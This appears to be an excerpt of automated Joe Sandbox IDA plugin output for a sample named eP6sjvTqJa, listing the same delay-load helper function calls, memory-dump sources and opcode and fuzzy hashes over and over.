                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 4efd54497283eefb25244bc883b666df2d1127d24948d0787b8e7d2c882b46a3
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 4efd54497283eefb25244bc883b666df2d1127d24948d0787b8e7d2c882b46a3
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ad52a5d45c1f593b160c033488c019f11a9c7087d79f633a1461f3a4fd839278
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: ad52a5d45c1f593b160c033488c019f11a9c7087d79f633a1461f3a4fd839278
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3f3b0f500c9160b97b1033c091ab8223a6dd74e9c51977be63639d6526876904
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 3f3b0f500c9160b97b1033c091ab8223a6dd74e9c51977be63639d6526876904
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d861aa1298c6919f8ee9e2dbc809beda64e58f2bccdd6b44719e793ff2627aec
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: d861aa1298c6919f8ee9e2dbc809beda64e58f2bccdd6b44719e793ff2627aec
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ec095bf5a1965f9595b1cad6e801003cce7b632a059acc638451bf668fad396f
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: ec095bf5a1965f9595b1cad6e801003cce7b632a059acc638451bf668fad396f
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 62996e78b5b38163e81e99407c747d0cd28f2e3a9ae825a81e4e02848b58290b
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 62996e78b5b38163e81e99407c747d0cd28f2e3a9ae825a81e4e02848b58290b
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 68388b550fd036fd397170a3e0b6e43b11b8097f8173473f76a5a50002df7c9f
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 68388b550fd036fd397170a3e0b6e43b11b8097f8173473f76a5a50002df7c9f
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: d0cb53f076c2ff8374ea3c6b3c182c8042101f6265fdfb2e8f755137a68ff669
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: d0cb53f076c2ff8374ea3c6b3c182c8042101f6265fdfb2e8f755137a68ff669
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6c7dd233f0ef18ab706ae329cc6474a9acf2915671ac240fd9e93b5bcc42e42b
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 6c7dd233f0ef18ab706ae329cc6474a9acf2915671ac240fd9e93b5bcc42e42b
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a919328e61be80fd68c071b25f11d79c29282d771e8ea33fb4b54afdba0d8adf
                                                                                                                    • Instruction ID: 0dc8612b6bf6b50bdb3ca9edf2b5088141ccc0bf8a9ab5f5cbad26f9f792c0d1
                                                                                                                    • Opcode Fuzzy Hash: a919328e61be80fd68c071b25f11d79c29282d771e8ea33fb4b54afdba0d8adf
                                                                                                                    • Instruction Fuzzy Hash: 5DA011E22A80023E3808E282AC82C3B038CC0C0B2033088FEF832AA080BC8088000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 6b1e07c7360fe2e1eb576cd8bd386476268c44d978934470fddcf2e4f298bb4c
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: 6b1e07c7360fe2e1eb576cd8bd386476268c44d978934470fddcf2e4f298bb4c
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 9f46c879124b480615844e868cd22513a2f3007f8d4cd9ca54bd5697609509af
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: 9f46c879124b480615844e868cd22513a2f3007f8d4cd9ca54bd5697609509af
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b29970a7fd764572a198b73aa6fb41c6dcf7662a94b3ca182a2f0c1e594b6222
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: b29970a7fd764572a198b73aa6fb41c6dcf7662a94b3ca182a2f0c1e594b6222
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: cbb7ebc414809569bcf3aab43592c78311a51eb927ec5b5d412c4341dcb17bf5
                                                                                                                    • Instruction ID: 3c059c212e3aa3a048ffea98f87d45041ff6762fdce07517b97b77c67fe2f95b
                                                                                                                    • Opcode Fuzzy Hash: cbb7ebc414809569bcf3aab43592c78311a51eb927ec5b5d412c4341dcb17bf5
                                                                                                                    • Instruction Fuzzy Hash: B6A011E22AC002BC3808E282AC82C3B038CC0C0B2033088FEF8228A080BC8088000832
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
